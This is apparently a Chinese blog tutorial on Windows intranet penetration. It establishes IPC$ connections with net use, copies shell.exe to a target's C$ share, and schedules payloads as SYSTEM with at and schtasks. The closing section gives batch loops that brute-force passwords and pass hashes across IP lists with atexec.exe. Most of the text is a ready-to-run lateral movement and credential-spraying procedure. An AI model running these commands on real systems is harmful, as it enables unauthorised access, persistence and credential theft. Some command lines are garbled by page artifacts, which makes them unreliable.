【内网渗透】ipc后设置定时任务at&schtasks

ipc连接

用户组

net use \ip “密码” /user:账号
【内网渗透】ipc后设置定时任务at&schtasks_第1张图片

net use \ip “密码” /user:域名\账号

【内网渗透】ipc后设置定时任务at&schtasks_第2张图片

建立IPC常见的错误代码

(1)5:拒绝访问,可能是使用的用户不是管理员权限,需要先提升权限
(2)51:网络问题,Windows 无法找到网络路径
(3)53:找不到网络路径,可能是IP地址错误、目标未开机、目标Lanmanserver服务未启动、有防火墙等问题
(4)67:找不到网络名,本地Lanmanworkstation服务未启动,目标删除ipc$
(5)1219:提供的凭据和已存在的凭据集冲突,说明已建立IPC$,需要先删除
(6)1326:账号密码错误
(7)1792:目标NetLogon服务未启动,连接域控常常会出现此情况
(8)2242:用户密码过期,目标有账号策略,强制定期更改密码

建立IPC失败的原因

(1)目标系统不是NT或以上的操作系统
(2)对方没有打开IPC$共享
(3)对方未开启139、445端口,或者被防火墙屏蔽
(4)输出命令、账号密码有错误
传输文件(需要连接权限大的账号)

Copy shell.exe \192.168.52.138\c$

设置定时任务at&schtasks

at < Windows2012

At \192.168.52.138 22:27 c:\shell.exe

【内网渗透】ipc后设置定时任务at&schtasks_第3张图片

schtasks >=Windows2012

schtasks /create /s 192.168.3.32 /ru “SYSTEM” /tn adduser /sc DAILY /tr c:\add.bat /F #创建 adduser 任务 对应执行文件
schtasks /run /s 192.168.3.32 /tn adduser /i #运行 adduser 任务
schtasks /delete /s 192.168.3.21 /tn adduser /f #删除 adduser 任务

【内网渗透】ipc后设置定时任务at&schtasks_第4张图片

ipc爆破

FOR /F %i in (ips.txt) do net use \%i\ipc$ “admin!@#45” /user:administrator
#批量检测 IP 对应明文连接

FOR /F %i in (ips.txt) do atexec.exe ./administrator:admin!@#45@%i whoami
#批量检测 IP 对应明文 回显版

FOR /F %i in (pass.txt) do atexec.exe ./administrator:%[email protected] whoami
#批量检测明文对应 IP 回显版

FOR /F %i in (hash.txt) do atexec.exe -hashes :%i ./[email protected] whoami
#批量检测 HASH 对应 IP 回显版

你可能感兴趣的:(内网渗透,网络,安全)